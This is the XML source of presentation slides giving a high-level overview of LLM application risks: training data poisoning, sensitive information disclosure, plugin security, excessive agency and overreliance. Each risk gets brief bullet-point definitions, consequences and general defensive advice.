                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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Trim fat, shrink size, go fast!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"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🌍 Redundancy &amp; Failover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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If U.S. servers crash, EU ones take over.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3413163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F91BED-B51B-5D4E-0C96-C17A1A01F5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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A7E96A-1EA3-F338-3CD9-408A7D2AAEC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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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602F5F80-A8F5-6945-0AAC-E64A0ED438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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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FOUNDATION MODELS vs. REAL-WORLD APPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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D61D199-4453-716F-6681-F7C23AE5B582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1700661"/>
            <a:ext cx="9486899" cy="38533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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🧠 Raw Power</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Versatile but unpredictable (bias, toxicity).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🛡️ Guardrails Needed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Filters, audits, security checks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>⚠️ Shared Risks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Bias | Privacy leaks | Misuse.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🔥 Unique App Risks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Hallucinations | Off-topic rambles | Data leaks.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8C465FB-EB2B-4C19-EE38-2CD1B2E38BA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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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3056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B90FB9-933F-8879-35E1-023D5D6BBD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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E2E8F4F-A1CB-CFB6-AC39-12370A8B9D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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-211014"/>
            <a:ext cx="12367652" cy="7178974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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1DE51D59-1D53-3AAF-51BF-17FF6A30B8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Training Data Poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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9DA6F4DC-341B-BC8D-9374-8919FBC5A8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625601"/>
            <a:ext cx="10134601" cy="4622799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1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>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Definition:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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Intentional corruption of AI training data to manipulate outcomes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Mechanism:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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Inserting misleading or incorrect data into the training set.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Impact Examples:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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Errors in facial recognition, misclassification in spam filters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Real-World Consequences:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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Security breaches, financial inaccuracies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Detection Challenges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 Subtle data alterations are hard to identify.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Overall Risk: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Compromises the foundational integrity of AI systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="542836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E31C3B7-8A0C-8C9D-DF73-2EEAFA1B4F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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B81DD635-BA04-FAB4-2D1E-9366166DC3A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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-77439" y="-219481"/>
            <a:ext cx="12367652" cy="7178974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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23970CA9-08E8-8846-FD3B-5362DFA974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>
                <a:solidFill>
                  <a:schemeClr val="accent1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Training Data Poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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B0B779D-EB20-E7BF-C76F-1F29C55648BB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511323" y="1766041"/>
            <a:ext cx="7207062" cy="48021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7238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14DEF8-BE3B-6045-0CDE-C719C9EC9F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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95721C77-2F6F-3C74-B835-B04A7919EBC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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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822284A8-6EFB-3F9F-F166-E6734026B2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Sensitive Information Disclosure</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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5212678B-C7DF-EC42-3D50-597551951B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625601"/>
            <a:ext cx="10832185" cy="4247298"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Potential for Disclosure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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LLMs may unintentionally expose private or confidential information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Associated Risks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Includes unauthorized access, intellectual property theft, and violations of privacy laws.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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User Interaction Guidelines: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Essential for users to learn safe practices when interacting with LLMs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Caution with Sensitive Data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Users should be vigilant about inputting sensitive information into LLM systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Emphasis on Data Protection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Focus on implementing strong security measures to protect sensitive information during LLM interactions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3689381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41ABCF-47A2-0CBA-CC04-DAD6B5A86F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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C6C21AE-1C0A-95CA-8D67-580ADB2C389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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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A294D0B7-54D6-4EA6-91BE-A2DB9FF24A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Plugin Security in LLM</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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87902E73-3EE6-21AE-244E-BD8CB790D6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625601"/>
            <a:ext cx="10832185" cy="4247298"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Plugin Activation and Use: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Plugins, once enabled, are routinely invoked by LLMs during user interactions, forming an integral part of system functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Vulnerability to Exploits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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These components are susceptible to attacks due to inadequate input validation and type-checking, exposing them to malicious manipulations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Potential Security Threats: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 primary risks include unauthorized data extraction, execution of harmful code remotely, and escalation of user privileges within the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Root Causes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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These security lapses generally stem from weak access controls and the system’s failure to properly monitor and manage authorization.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35840274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D07112-AF90-ACDA-DD7B-F6B0BB2969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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D4C7C45-F366-A7F4-F08C-96B1FE7D44E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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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FBC06413-62A5-358A-0D84-93D0190E54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Excessive Agency</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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929CFE84-0F82-1102-7542-8E8CA0A24F9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625601"/>
            <a:ext cx="10832185" cy="4247298"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Definition of Excessive Agency: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Excessive agency occurs when AI systems autonomously make decisions beyond their intended scope, often without clear human directives.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Ethical Concerns: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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AI with excessive agency may perform actions that lead to ethical dilemmas, such as privacy breaches or unconsented data usage. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Safety Risks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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AI systems exhibiting excessive autonomy can pose serious safety risks, particularly in sectors like healthcare or transportation, where unexpected decisions could have dire consequences.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Regulatory Compliance:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Autonomous decisions by AI could inadvertently breach regulatory frameworks, leading to legal challenges for organizations. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Unpredictability: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 autonomous nature of these systems can make their behavior unpredictable, complicating management and integration into regulated environments.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88607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8AD459-E957-9CEC-DEF3-636B84EB68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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BAE91B8-765F-DEA9-A8AA-C85BF540731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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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60054637-997A-223A-6E6D-B7A21E4011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Overreliance</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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5E67B152-C1BD-6F0D-B952-FEA97D3E08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625601"/>
            <a:ext cx="10832185" cy="4247298"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Definition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Overreliance occurs when the outputs of LLMs are accepted without sufficient scrutiny, potentially leading to the use of inaccurate or inappropriate information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Consequences: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Includes security vulnerabilities, spread of misinformation, and the propagation of biased or unethical content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Example in Legal Sector: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Legal professionals may use LLMs to draft documents; errors due to outdated or misunderstood information can result in legal misrepresentations or malpractice.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Example in Healthcare: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Medical professionals using LLMs for diagnostic support might accept incorrect diagnoses, leading to improper treatment and endangering patient health.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Importance: </a:t>
            </a:r>
            <a:r>
